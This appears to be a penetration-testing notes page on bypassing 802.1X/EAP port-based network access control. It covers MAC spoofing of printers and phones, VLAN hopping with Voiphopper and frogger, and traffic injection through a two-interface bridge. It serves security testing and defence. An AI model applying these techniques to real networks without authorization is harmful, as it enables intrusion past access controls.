802.1X / EAP Bypass
Last updated
Last updated
Physical port-based network access control
The new device has to authenticate in order to access the network beyond the switch
SUPPLICANT : The new device
AUTHENTICATOR : The switch (or Wireless AP)
AUTHENTICATION SERVER : The server responsible for checking credentials (Usually a RADIUS server)
Defines authentication message formats
LOTS of different formats (EAP-MD5, EAP-TLS, EAP-TTLS, EAP-PSK, etc…)
Some are very weak (LEAP)
EAP is NOT a wire protocol
EAP messages are encapsulated by other protocols
EAPoL = EAP over LAN
PEAP = Protected EAP (mainly used on Windows systems)
To use NAC with 802.1X, all devices that are authenticating to the network must support the EAP method in use and have the necessary supplicant software. Devices that do not support 802.1X or do not support the EAP type in use are generally excluded from network policies (such as printers and other embedded devices), creating a bypass opportunity if an attacker can access the port.
The Authenticator defines 2 logical states per physical port
Uncontrolled State
Controlled State
The uncontrolled state allows 802.1x frames only
The Authenticator forwards the frames to the Authentication Server
The controlled state acts like a “normal” port
The network is fully accessible
From this point, any packet can go wherever it needs to on the network without authentication
802.1x only acts as a gatekeeper, If a device is compromised when already connected to the LAN, 802.1x protection is useless.
802.1x is not a solution to protect a LAN against BYOD hazards, The compromised device will authenticate against 802.1x as usual.
It is also possible to retrieve credentials/certificates on legitimate devices
bruteforce is not possible
It is possible to spoof the mac address of following devices and obtain network access:
Physical devices like old VOIP phone, Printers, cameras etc may not support 802.1x authentication and mac addresses assigned to these devices can be spoofed to obtain IP address.
Physical access to 802.1x authenticated VOIP phones, printer, etc may disclose mac and IP info from the network settings menu, stickers on the backside, etc.
Boot menu of certain workstations, laptops etc may disclose mac address.
CDP protocol can be abused to hop the VLAN and obtain IP address.
Voiphopper can be used to execute this attack.
It is possible to hop VLANs by abusing DTP protocol.
frogger can be used to execute such attacks
Fire up wireshark and check for MAC addresses in probe request. Try spoofing the MAC gathered from probe request.
In a post-connect scenario you are allowed to the network for a small period of time and a set of checks are ran against your endpoint. If the endpoint fails to meet the requirements, it will be disallowed to use any resource further
802.1x provides Network Access Control. It does NOT provide traffic encryption (many people believe it does). It does NOT provide per-packet authentication.
Traffic Injection : spoof a legitimate and authenticated supplicant’s MAC and IP address to fake legitimate packets. it still works today in a vast majority of cases (Especially works in traditional Windows environments)
Traffic Injection is the most reliable technique to physically attack a 802.1x network
You need 2 interfaces for this
Frames at “A” : appear to be coming from the legitimate host
Frames at “B” : appear to be coming from the network
Frames at “C” : appear to be addressed to the legitimate host
Frames at “D” : appear to be addressed to the network
